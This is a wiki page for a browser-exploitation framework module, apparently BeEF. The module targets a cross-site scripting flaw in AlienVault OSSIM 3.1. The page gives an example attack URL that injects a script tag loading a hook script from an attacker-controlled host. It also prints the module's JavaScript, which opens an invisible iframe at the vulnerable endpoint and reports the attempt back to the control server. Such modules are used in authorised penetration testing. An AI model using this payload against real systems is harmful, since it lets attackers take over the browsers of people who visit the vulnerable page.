Skip to content

Module: AlienVault OSSIM 3.1 XSS

Haoxi Tan edited this page Jan 9, 2020 · 2 revisions

Summary

  • Objective: Attempts to hook AlienVault OSSIM 3.1 using XSS

  • Authors: bcoles, muts

  • Browsers: All

  • Code

Internal Working

Creates an iframe targetting the AlienVault endpoint vulnerable to XSS.

Example target URL: http://target/ossim/top.php?option=3&soption=3&url=<script src=http://0.0.0.0:3000/hook.js></script>

        var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');

        var alienvault_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
        alienvault_iframe_<%= @command_id %>.setAttribute('src', uri);

        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

References

http://www.exploit-db.com/exploits/20062/

Feedback

Clone this wiki locally